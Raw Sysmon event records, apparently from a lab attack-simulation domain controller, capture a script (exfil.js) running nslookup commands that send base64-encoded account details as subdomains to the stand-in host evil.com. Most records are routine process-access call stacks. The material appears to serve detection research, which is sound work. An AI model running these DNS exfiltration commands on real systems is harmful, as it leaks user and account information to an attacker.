10341000x8000000000000000206775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.872{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-C542-000000005F02}7320C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.868{2E1864BB-18E5-629A-C542-000000005F02}73206208C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-C442-000000005F02}7460C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.850{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C542-000000005F02}7320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.850{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.850{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.850{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.850{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.850{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C442-000000005F02}7460C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.850{2E1864BB-18E0-629A-6742-000000005F02}39763236C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-C442-000000005F02}7460C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.853{2E1864BB-18E5-629A-C442-000000005F02}7460C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllenv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.835{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmna.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.819{2E1864BB-18E5-629A-C242-000000005F02}18485104C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-C342-000000005F02}1400C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.819{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.819{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.819{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.819{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.819{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C342-000000005F02}1400C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.819{2E1864BB-18E5-629A-C142-000000005F02}74562020C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-C342-000000005F02}1400C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.829{2E1864BB-18E5-629A-C342-000000005F02}1400C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-C142-000000005F02}7456C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmna.tmp 2>&1 22542200x8000000000000000206756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.861{00000000-0000-0000-0000-000000000000}5740evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.785{00000000-0000-0000-0000-000000000000}6092evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.689{00000000-0000-0000-0000-000000000000}5060evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.621{00000000-0000-0000-0000-000000000000}5696evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.510{00000000-0000-0000-0000-000000000000}3620evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.447{00000000-0000-0000-0000-000000000000}8124evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.378{00000000-0000-0000-0000-000000000000}7732evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.262{00000000-0000-0000-0000-000000000000}4004evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.107{00000000-0000-0000-0000-000000000000}6604evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.053{00000000-0000-0000-0000-000000000000}2604evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000206746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.986{00000000-0000-0000-0000-000000000000}1736evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000206745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.803{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-C242-000000005F02}1848C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.803{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-C242-000000005F02}1848C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.788{2E1864BB-18E5-629A-C242-000000005F02}18485104C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-C142-000000005F02}7456C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.772{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C242-000000005F02}1848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.772{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C142-000000005F02}7456C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.772{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.772{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.772{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.772{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.771{2E1864BB-18E0-629A-6742-000000005F02}39767832C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-C142-000000005F02}7456C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 